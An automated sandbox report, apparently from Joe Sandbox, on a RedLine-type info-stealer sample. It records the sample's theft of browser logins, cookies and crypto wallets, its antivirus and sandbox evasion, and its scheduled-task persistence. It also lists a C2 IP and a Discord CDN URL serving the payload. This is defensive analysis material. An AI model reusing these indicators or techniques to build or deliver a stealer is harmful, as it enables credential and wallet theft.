          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
          Source: file.exe, 00000000.00000002.412673826.0000000001502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.393558543.00000000014C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: file.exe, type: SAMPLE
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 0.0.file.exe.e20000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000000.309008027.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 1352, type: MEMORYSTR
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: Yara matchFile source: 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 1352, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: file.exe, type: SAMPLE
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 0.0.file.exe.e20000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000000.309008027.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 1352, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts221
          Windows Management Instrumentation
          1
          Scheduled Task/Job
          11
          Process Injection
          1
          Masquerading
          1
          OS Credential Dumping
          751
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium11
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Scheduled Task/Job
          Boot or Logon Initialization Scripts1
          Scheduled Task/Job
          1
          Disable or Modify Tools
          LSASS Memory11
          Process Discovery
          Remote Desktop Protocol2
          Data from Local System
          Exfiltration Over Bluetooth1
          Non-Standard Port
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)551
          Virtualization/Sandbox Evasion
          Security Account Manager551
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
          Ingress Tool Transfer
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer2
          Non-Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
          Obfuscated Files or Information
          LSA Secrets1
          Remote System Discovery
          SSHKeyloggingData Transfer Size Limits13
          Application Layer Protocol
          Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Software Packing
          Cached Domain Credentials1
          File and Directory Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Timestomp
          DCSync124
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 746784 Sample: file.exe Startdate: 15/11/2022 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 4 other signatures 2->51 8 file.exe 15 7 2->8         started        13 oobeldr.exe 2->13         started        process3 dnsIp4 33 37.139.128.203, 44588, 49706 LVLT-10753US Germany 8->33 35 cdn.discordapp.com 162.159.133.233, 443, 49707 CLOUDFLARENETUS United States 8->35 27 C:\Users\user\AppData\Local\Temp\Setup.exe, PE32 8->27 dropped 29 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 8->29 dropped 53 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->53 55 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->55 57 Tries to harvest and steal browser information (history, passwords, etc) 8->57 59 Tries to steal Crypto Currency Wallets 8->59 15 Setup.exe 1 8->15         started        61 Multi AV Scanner detection for dropped file 13->61 63 Query firmware table information (likely to detect VMs) 13->63 65 Tries to detect sandboxes and other dynamic analysis tools (window names) 13->65 67 3 other signatures 13->67 19 schtasks.exe 1 13->19         started        file5 signatures6 process7 file8 31 C:\Users\user\AppData\Roaming\...\oobeldr.exe, PE32 15->31 dropped 37 Multi AV Scanner detection for dropped file 15->37 39 Query firmware table information (likely to detect VMs) 15->39 41 Machine Learning detection for dropped file 15->41 43 3 other signatures 15->43 21 schtasks.exe 1 15->21         started        23 conhost.exe 19->23         started        signatures9 process10 process11 25 conhost.exe 21->25         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe76%ReversingLabsByteCode-MSIL.Trojan.RedLine
          file.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\Setup.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\Setup.exe62%ReversingLabsWin32.Trojan.Tiggre
          C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe62%ReversingLabsWin32.Trojan.Tiggre
          SourceDetectionScannerLabelLinkDownload
          1.2.Setup.exe.13e0000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          1.0.Setup.exe.13e0000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          6.0.oobeldr.exe.200000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          6.2.oobeldr.exe.200000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
          http://tempuri.org/0%URL Reputationsafe
          http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
          http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
          http://tempuri.org/Entity/Id90%URL Reputationsafe
          http://tempuri.org/Entity/Id80%URL Reputationsafe
          http://tempuri.org/Entity/Id50%URL Reputationsafe
          http://tempuri.org/Entity/Id40%URL Reputationsafe
          http://tempuri.org/Entity/Id70%URL Reputationsafe
          http://tempuri.org/Entity/Id60%URL Reputationsafe
          http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
          http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
          http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
          https://api.ip.sb/ip0%URL Reputationsafe
          http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
          http://tempuri.org/Entity/Id200%URL Reputationsafe
          http://tempuri.org/Entity/Id210%URL Reputationsafe
          http://tempuri.org/Entity/Id220%URL Reputationsafe
          http://tempuri.org/Entity/Id230%URL Reputationsafe
          http://tempuri.org/Entity/Id240%URL Reputationsafe
          http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
          http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
          http://tempuri.org/Entity/Id100%URL Reputationsafe
          http://tempuri.org/Entity/Id110%URL Reputationsafe
          http://tempuri.org/Entity/Id120%URL Reputationsafe
          http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
          http://tempuri.org/Entity/Id130%URL Reputationsafe
          http://tempuri.org/Entity/Id140%URL Reputationsafe
          http://tempuri.org/Entity/Id150%URL Reputationsafe
          http://tempuri.org/Entity/Id160%URL Reputationsafe
          http://tempuri.org/Entity/Id170%URL Reputationsafe
          http://tempuri.org/Entity/Id180%URL Reputationsafe
          http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
          http://tempuri.org/Entity/Id190%URL Reputationsafe
          http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
          http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
          http://ocsp.sectigo.com00%URL Reputationsafe
          http://tempuri.org/Entity/Id23Response0%URL Reputationsafe
          https://cdn.discordapp.com40%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          cdn.discordapp.com
          162.159.133.233
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://cdn.discordapp.com/attachments/1013922792204415100/1029136565533933638/Setup.exefalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://schemas.xmlsoap.org/ws/2005/02/sc/sctfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000002.439789078.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.437460819.000000000447A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.432707724.0000000004363000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438747488.000000000458E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://duckduckgo.com/ac/?q=file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://tempuri.org/Entity/Id12Responsefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://tempuri.org/file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://tempuri.org/Entity/Id2Responsefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://tempuri.org/Entity/Id21Responsefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://tempuri.org/Entity/Id9file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://tempuri.org/Entity/Id8file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/Entity/Id5file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Preparefile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://tempuri.org/Entity/Id4file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://tempuri.org/Entity/Id7file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://tempuri.org/Entity/Id6file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultpfile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/Entity/Id19Responsefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensefile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuefile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/faultfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2004/10/wsatfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://tempuri.org/Entity/Id15Responsefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registerfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://tempuri.org/Entity/Id6Responsefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://api.ip.sb/ipfile.exefalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2004/04/scfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://tempuri.org/Entity/Id9Responsefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://tempuri.org/Entity/Id20file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://tempuri.org/Entity/Id21file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://tempuri.org/Entity/Id22file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id23file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id24file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issuefile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Entity/Id24Responsefile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.416272866.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://tempuri.org/Entity/Id1Responsefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=file.exe, 00000000.00000002.439789078.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.437460819.000000000447A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.432707724.0000000004363000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438747488.000000000458E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.429735621.0000000004304000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.438634686.0000000004571000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.419053944.0000000003617000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415390893.00000000033D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedfile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Replayfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegofile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binaryfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingfile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuefile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2004/04/trustfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://tempuri.org/Entity/Id10file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://tempuri.org/Entity/Id11file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://tempuri.org/Entity/Id12file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://tempuri.org/Entity/Id16Responsefile.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsefile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelfile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Entity/Id13file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id14file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id15file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id16file.exe, 00000000.00000002.414655093.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Noncefile.exe, 00000000.00000002.415088005.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
